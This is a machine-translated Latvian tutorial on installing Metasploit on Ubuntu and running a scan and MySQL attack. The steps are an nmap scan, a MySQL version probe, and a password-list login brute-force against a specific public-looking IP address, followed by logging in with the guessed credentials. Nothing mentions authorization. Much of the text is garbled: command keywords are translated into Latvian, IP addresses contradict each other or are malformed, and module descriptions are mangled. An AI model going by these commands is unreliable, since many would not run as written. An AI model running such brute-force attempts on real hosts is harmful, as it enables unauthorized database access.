Satura rādītājs
Metasploit ietvars, ir rīks, lai izstrādātu un palaistu izmantošanu pret datoru vai serveri. Metasploit Framework ir uzrakstīts rubīna valodā, tas ir daudzplatformu, un tā darbināšanai nepieciešams jaudīgs dators, ir maksas versija un bezmaksas versija kopienai.To var lejupielādēt vietnē www.metasploit.com/framework/download
Mēs gatavojamies instalēt Linux Ubutnu, bet tas darbojas citiem distros, mainot dažas komandas.
Mēs piekļūstam termināļa logam un instalējam rubīnu, pirms tas strādāja ar perl, bet tas bija ieprogrammēts pilnīgi jauns.
Mēs instalējam rubīna atkarības, lai pēc tam varētu palaist ietvaru.
sudo apt-get install ruby libruby rdoc sudo apt-get install libyaml-ruby sudo apt-get install libzlib-ruby sudo apt-get install libopenssl-ruby sudo apt-get install libdl-ruby sudo apt-get install libreadline-ruby sudo apt -get instalēt libiconv-ruby sudo apt-get install rubygems * sudo apt-get install libgtk2-ruby libglade2-ruby
Atkarībā no versijas, kuru lejupielādēsim 32 vai 64 bitus no termink, mēs piešķirsim atļauju:
chmod + x metasploit-latest-linux-x64-installer.run
Mēs palaižam instalētāju un tiks atvērts instalēšanas logs:
sudo metasploit-latest-linux-x64-installer.run
Instalēšanas beigās no termināļa loga un ar root piekļuvi mēs atjauninām sistēmu
ar komandu:
msfupdate
Metasploit ir programma bez grafiskas vides, kas pilnībā darbojas terminālī. Mēs piekļūstam programmatūrai no termināļa ar komandu:
msfconsole
Zinot MSF iekšēji
MSF (Metasploit Framework) Tas ir strukturēts vairākos moduļos, piemēram:
Izmanto Kādi ir MSF pieejamie skripti un programmas un kurus mēs varam izmantot, tie ir sakārtoti pēc operētājsistēmas un kategorijām, piemēram, exploits / windows / browser /, kas ir izmantojami pārlūkiem, kas darbojas sistēmā Windows.
Derīgās kravas: Tā ir darbība, kas tiks veikta, ja mūsu pārbaudāmo ievainojamību varēs atrast un izmantot.
Papildu: palīgskripti ar dažādām funkcijām, piemēram, palīgs / skeneris / portscan / tcp un, izmantojot šo tcp porta skeneri, mēs iegūtu porta statusu. Šis skripts ir alternatīva Nmap.
Ietver: Viņi kodē skriptu, lai izvairītos no dažiem pretvīrusiem un pretpirkstotājiem.
Mēs sākam testa piemēru no mūsu izpildāmā termināļa:./msfconsole
Mēs sāksim, skenējot ip ar nmap
msf> nmap -sV 190.155.80.110
Mēs aktivizējam papildu moduli, lai piekļūtu skripta rīkiem, kas ļaus strādāt ar mysql. Mēs varam redzēt arī moduļa versiju.
msf> palīgdarbības (mysql_version)> iestatiet RHOSTS 190.155.80.110 // iestatiet tālvadības ip msf> iestatiet RHOSTS 192.155.80.110 msf> palīgdarbības (mysql_version)> palaist // pārbaudiet mysql versiju
Ja tas tiek izpildīts pareizi, tas var atgriezt mysql versiju:
[*] 190.155.80.110 darbojas Mysql5.0
Vēl viens gadījums ar skenēšanas moduli un mēģinājumu mainīt mysql saknes lietotāju:
msf> izmantot skeneri / mysql / mysql_login msf> iestatīt USERNAME admin msf> iestatīt PASS_FILE /tmp/keys.lst // teksta fails ar iespējamām atslēgām zem otra msf> exploit
Ja tas darbojas, mēs varam pieteikties mysql:
mysql -h 1920,155,80,110 -u admin -pkey